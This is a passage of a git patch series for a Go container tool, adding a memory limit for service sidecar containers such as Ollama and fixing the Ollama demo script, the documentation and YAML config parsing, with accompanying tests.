"items", svcConfigs[i].Provisions) // IIFE so defer lw.Close() fires after provisionService, not at function exit. // Without this, multiple provision-capable services would accumulate deferred From 76605a8cf2ed01c411a970ee60c2f84f4f88c5aa Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:14:58 +0000 Subject: [PATCH 22/27] fix(examples): add Content-Type header and surface errors in ollama demo --- examples/service-ollama/demo.sh | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index fd4c3fe4..5dfbbfb8 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -10,7 +10,8 @@ curl -s "$MOAT_OLLAMA_URL/api/tags" echo echo "--- Generating response ---" -curl -s "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ - | jq -r .response +result=$(curl -s -H 'Content-Type: application/json' \ + "$MOAT_OLLAMA_URL/api/generate" \ + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}') +echo "$result" | jq -r '.response // (.error | "Error: " + .)' echo From 8363fd533eec87bcf8811d52bee80c9071bb57b6 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:17:10 +0000 Subject: [PATCH 23/27] fix(examples): use qwen2.5-coder:0.5b to fit in constrained environments --- examples/service-ollama/demo.sh | 2 +- examples/service-ollama/moat.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 5dfbbfb8..0bd1cc32 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -12,6 +12,6 @@ echo echo "--- Generating response ---" result=$(curl -s -H 'Content-Type: application/json' \ "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}') + -d 
'{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}') echo "$result" | jq -r '.response // (.error | "Error: " + .)' echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index 8ffde955..d29806df 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -19,6 +19,6 @@ dependencies: services: ollama: models: - - qwen2.5-coder:1.5b + - qwen2.5-coder:0.5b command: ["sh", "/workspace/demo.sh"] From bd98956a1f51e5ae904442353656097f6922f4ad Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:18:54 +0000 Subject: [PATCH 24/27] fix(examples): pipe curl directly to jq, avoid shell variable mangling --- examples/service-ollama/demo.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 0bd1cc32..c7722541 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -10,8 +10,8 @@ curl -s "$MOAT_OLLAMA_URL/api/tags" echo echo "--- Generating response ---" -result=$(curl -s -H 'Content-Type: application/json' \ +curl -s -H 'Content-Type: application/json' \ "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}') -echo "$result" | jq -r '.response // (.error | "Error: " + .)' + -d '{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}' \ + | jq -r '.response // ("Error: " + .error)' echo From 503e79c43b9075048e77cd952b32522ec234ae63 Mon Sep 17 00:00:00 2001 From: "claude[bot]" <41898282+claude[bot]@users.noreply.github.com> Date: Tue, 17 Mar 2026 22:22:17 +0000 Subject: [PATCH 25/27] fix(docs): correct ollama version in examples to 0.18.1, pipe api/tags to jq --- docs/content/guides/08-services.md | 2 +- docs/content/reference/02-moat-yaml.md | 2 +- examples/service-ollama/demo.sh | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git 
a/docs/content/guides/08-services.md b/docs/content/guides/08-services.md index 0012c44e..2783b134 100644 --- a/docs/content/guides/08-services.md +++ b/docs/content/guides/08-services.md @@ -200,7 +200,7 @@ Ollama provides local model inference without external API keys: ```yaml dependencies: - - ollama@0.9 + - ollama@0.18.1 services: ollama: diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index 7eef34a5..f334d3b6 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -266,7 +266,7 @@ dependencies: | `mysql@8` | MySQL 8 | 3306 | | `mysql@9` | MySQL 9 | 3306 | | `redis@7` | Redis 7 | 6379 | -| `ollama@0.9` | Ollama | 11434 | +| `ollama@0.18.1` | Ollama | 11434 | Each service injects `MOAT_*` environment variables into the main container. See [Service environment variables](#service-environment-variables) for the full list. diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index c7722541..0946b776 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -6,7 +6,7 @@ echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL" echo echo "--- Available models ---" -curl -s "$MOAT_OLLAMA_URL/api/tags" +curl -s "$MOAT_OLLAMA_URL/api/tags" | jq . echo echo "--- Generating response ---" From fd110412e627dd38a063640f8798fa49413cd70e Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:34:13 +0000 Subject: [PATCH 26/27] feat(services): add memory limit for service sidecar containers Add a 'memory' field to ServiceSpec so users can configure the memory limit for service sidecar containers (e.g., Ollama) independently of the main agent container's container.memory setting. Wire through ServiceConfig.MemoryMB -> SidecarConfig.MemoryMB, applied as Docker HostConfig.Resources.Memory and Apple --memory flag. Update the Ollama example to use memory: 2048 with qwen2.5-coder:1.5b. 
--- docs/content/reference/02-moat-yaml.md | 4 +++ examples/service-ollama/demo.sh | 2 +- examples/service-ollama/moat.yaml | 3 ++- internal/config/config.go | 7 +++--- internal/container/apple_service.go | 4 +++ internal/container/apple_service_test.go | 31 ++++++++++++++++++++++++ internal/container/docker.go | 3 +++ internal/container/docker_service.go | 1 + internal/container/runtime.go | 5 ++++ internal/run/services.go | 6 +++++ internal/run/services_test.go | 16 ++++++++++++ 11 files changed, 77 insertions(+), 5 deletions(-) diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index f334d3b6..39eea67e 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -869,10 +869,13 @@ Each key matches a service name from `dependencies:` (e.g., `postgres`, `mysql`, |-------|------|---------|-------------| | `env` | `map[string]string` | `{}` | Environment variables for the service container. Supports secret references. | | `image` | `string` | (auto) | Override default image (Docker runtime only) | +| `memory` | `integer` | (runtime default) | Memory limit for the service container in MB. Useful for memory-intensive services like Ollama. | | `wait` | `boolean` | `true` | Block main container start until service is ready | Setting `wait: false` starts the main container without waiting for the service health check to pass. +`memory` sets the limit for the service sidecar container, independent of `container.memory` (which limits the main agent container). + ### Service-specific lists Some services accept additional list configuration beyond `env` and `wait`. 
These keys are defined by the service's registry entry: @@ -886,6 +889,7 @@ Example: ```yaml services: ollama: + memory: 4096 # 4 GB — size to match your largest model models: - qwen2.5-coder:7b - nomic-embed-text diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 0946b776..c8d30520 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -12,6 +12,6 @@ echo echo "--- Generating response ---" curl -s -H 'Content-Type: application/json' \ "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}' \ + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ | jq -r '.response // ("Error: " + .error)' echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index d29806df..52ec5421 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -18,7 +18,8 @@ dependencies: services: ollama: + memory: 2048 models: - - qwen2.5-coder:0.5b + - qwen2.5-coder:1.5b command: ["sh", "/workspace/demo.sh"] diff --git a/internal/config/config.go b/internal/config/config.go index ec1af7ec..ccce5ebc 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -149,9 +149,10 @@ type MCPAuthConfig struct { // ServiceSpec allows customizing service behavior. type ServiceSpec struct { - Env map[string]string `yaml:"env,omitempty"` - Image string `yaml:"image,omitempty"` - Wait *bool `yaml:"wait,omitempty"` + Env map[string]string `yaml:"env,omitempty"` + Image string `yaml:"image,omitempty"` + Wait *bool `yaml:"wait,omitempty"` + Memory int `yaml:"memory,omitempty"` // Memory limit in MB for the service container (0 = runtime default) // Extra holds unknown list-valued keys (e.g., "models" for ollama). // Populated by UnmarshalYAML. The run layer maps these to provisions // using the registry's provisions_key. 
diff --git a/internal/container/apple_service.go b/internal/container/apple_service.go index b92d5e0a..cb21d85f 100644 --- a/internal/container/apple_service.go +++ b/internal/container/apple_service.go @@ -153,6 +153,10 @@ func buildAppleRunArgs(cfg ServiceConfig, networkID string) []string { args = append(args, "--network", networkID) } + if cfg.MemoryMB > 0 { + args = append(args, "--memory", fmt.Sprintf("%dMB", cfg.MemoryMB)) + } + // Add cache mount if configured if cfg.CachePath != "" && cfg.CacheHostPath != "" { args = append(args, "--volume", cfg.CacheHostPath+":"+cfg.CachePath) diff --git a/internal/container/apple_service_test.go b/internal/container/apple_service_test.go index 2149bbb9..01404fae 100644 --- a/internal/container/apple_service_test.go +++ b/internal/container/apple_service_test.go @@ -115,6 +115,37 @@ func TestGetContainerIPExists(t *testing.T) { assert.Error(t, err) } +func TestAppleBuildRunArgsWithMemory(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.18.1", + Image: "ollama/ollama", + Env: map[string]string{}, + MemoryMB: 2048, + } + + args := buildAppleRunArgs(cfg, "") + for i, a := range args { + if a == "--memory" && i+1 < len(args) { + assert.Equal(t, "2048MB", args[i+1]) + return + } + } + t.Fatal("--memory flag not found in args") +} + +func TestAppleBuildRunArgsNoMemoryByDefault(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.18.1", + Image: "ollama/ollama", + Env: map[string]string{}, + } + + args := buildAppleRunArgs(cfg, "") + assert.NotContains(t, args, "--memory") +} + func TestAppleBuildRunArgsWithCachePath(t *testing.T) { cfg := ServiceConfig{ Name: "ollama", diff --git a/internal/container/docker.go b/internal/container/docker.go index e4be6ab1..ff9ca741 100644 --- a/internal/container/docker.go +++ b/internal/container/docker.go @@ -976,6 +976,9 @@ func (m *dockerSidecarManager) StartSidecar(ctx context.Context, cfg SidecarConf NetworkMode: 
container.NetworkMode(cfg.NetworkID), Privileged: cfg.Privileged, Mounts: mounts, + Resources: container.Resources{ + Memory: int64(cfg.MemoryMB) * 1024 * 1024, // 0 means no limit + }, }, &network.NetworkingConfig{ EndpointsConfig: map[string]*network.EndpointSettings{ diff --git a/internal/container/docker_service.go b/internal/container/docker_service.go index c926dd62..ed692831 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -170,6 +170,7 @@ func buildSidecarConfig(cfg ServiceConfig, networkID string) SidecarConfig { NetworkID: networkID, RunID: cfg.RunID, Env: envList, + MemoryMB: cfg.MemoryMB, Labels: map[string]string{ "moat.role": "service", }, diff --git a/internal/container/runtime.go b/internal/container/runtime.go index 9337df93..d0323117 100644 --- a/internal/container/runtime.go +++ b/internal/container/runtime.go @@ -232,6 +232,8 @@ type ServiceConfig struct { Provisions []string // ProvisionCmd is the command template with {item} placeholder. ProvisionCmd string + // MemoryMB is the memory limit for the service container in megabytes (0 = runtime default). + MemoryMB int } // ServiceInfo contains connection details for a started service. @@ -337,6 +339,9 @@ type SidecarConfig struct { // Labels are container labels (merged with defaults) Labels map[string]string + + // MemoryMB is the memory limit for the container in megabytes (0 = no limit). + MemoryMB int } // MountConfig describes a volume mount (bind mount from host to container). 
diff --git a/internal/run/services.go b/internal/run/services.go index b268dc13..3723283f 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -224,6 +224,11 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv cacheHostPath = filepath.Join(homeDir, ".moat", "cache", dep.Name) } + var memoryMB int + if userSpec != nil { + memoryMB = userSpec.Memory + } + return container.ServiceConfig{ Name: dep.Name, Version: dep.Version, @@ -238,6 +243,7 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv CacheHostPath: cacheHostPath, Provisions: provisions, ProvisionCmd: spec.Service.ProvisionCmd, + MemoryMB: memoryMB, }, nil } diff --git a/internal/run/services_test.go b/internal/run/services_test.go index d0870e7c..94310d51 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -179,6 +179,22 @@ func TestBuildServiceConfigOllamaNoModels(t *testing.T) { assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) } +func TestBuildServiceConfigMemory(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", &config.ServiceSpec{Memory: 2048}) + require.NoError(t, err) + assert.Equal(t, 2048, cfg.MemoryMB) +} + +func TestBuildServiceConfigMemoryDefault(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + assert.Equal(t, 0, cfg.MemoryMB, "zero means runtime default") +} + func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} From db2d1f12f03b7e3280a961f469bebd1d9d7e155c Mon Sep 17 00:00:00 2001 From: "claude[bot]" <41898282+claude[bot]@users.noreply.github.com> Date: Tue, 17 Mar 2026 22:38:11 +0000 Subject: [PATCH 27/27] fix(config): add memory to known fields in 
ServiceSpec UnmarshalYAML The known map used to skip processing of parsed struct fields was missing "memory", causing memory: values to leak into Extra as nil. This caused buildServiceConfig to reject memory: as an unknown key when combined with provision-capable services (e.g. ollama). The example moat.yaml, which uses both memory: 2048 and models: [...], would fail at runtime. Also adds a test that exercises YAML with both memory: and models: to prevent regression. --- internal/config/config.go | 2 +- internal/config/config_test.go | 17 +++++++++++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/internal/config/config.go b/internal/config/config.go index ccce5ebc..cbe4766d 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -172,7 +172,7 @@ func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error { if value.Kind != yaml.MappingNode { return nil } - known := map[string]bool{"env": true, "image": true, "wait": true} + known := map[string]bool{"env": true, "image": true, "wait": true, "memory": true} for i := 0; i+1 < len(value.Content); i += 2 { key := value.Content[i].Value val := value.Content[i+1] diff --git a/internal/config/config_test.go b/internal/config/config_test.go index f89eda88..00844e4d 100644 --- a/internal/config/config_test.go +++ b/internal/config/config_test.go @@ -2350,3 +2350,20 @@ typo_key: some_value assert.Contains(t, spec.Extra, "typo_key") assert.Nil(t, spec.Extra["typo_key"]) } + +func TestServiceSpecUnmarshalMemoryNotLeakedToExtra(t *testing.T) { + // memory: is a known ServiceSpec field — it must not leak into Extra. + // If it did, buildServiceConfig would reject it as an unknown key when + // combined with a provisions-capable service like ollama. 
+ input := ` +memory: 2048 +models: + - qwen2.5-coder:1.5b +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, 2048, spec.Memory) + assert.NotContains(t, spec.Extra, "memory", "memory must not appear in Extra") + assert.Equal(t, []string{"qwen2.5-coder:1.5b"}, spec.Extra["models"]) +}